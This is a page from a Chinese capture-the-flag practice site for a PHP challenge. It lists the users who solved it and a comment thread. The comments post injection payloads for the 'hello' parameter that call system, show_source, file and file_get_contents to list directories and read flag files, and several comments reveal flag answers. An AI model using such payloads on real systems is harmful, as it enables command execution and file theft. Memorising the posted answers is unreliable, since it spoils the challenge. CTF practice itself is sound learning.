评分(10)
解题动态
Tim.Drake 攻破了该题 1小时前
语默人 攻破了该题 1小时前
frozenfish0x 攻破了该题 8小时前
2212994366 攻破了该题 14小时前
Dayssss 攻破了该题 14小时前
卡面来打123 攻破了该题 1天前
小狗喵喵喵 攻破了该题 1天前
yangyy 攻破了该题 1天前
hdcc1 攻破了该题 1天前
xiaoxiaojiangshi 攻破了该题 1天前
YanC1e 攻破了该题 1天前
假面骑士佟以冬 攻破了该题 1天前
K-423 攻破了该题 2天前
rourou 攻破了该题 2天前
zzxmxlmz123 攻破了该题 2天前
爆汁酸菜鱼 攻破了该题 3天前
bak3l1 攻破了该题 3天前
Arno_Zoffy 攻破了该题 3天前
Newdap 攻破了该题 3天前
评论
18092952956 1年前
举报
show_source('flag.php')
BlueL1ght 1年前
举报
system("cat+flag.php")
zhuleixy 1年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 2年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 2年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 2年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 2年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 2年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 2年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}
18843672580 2年前
举报
flag{21ebfdf5494104f4f54eca2bdd3cb902}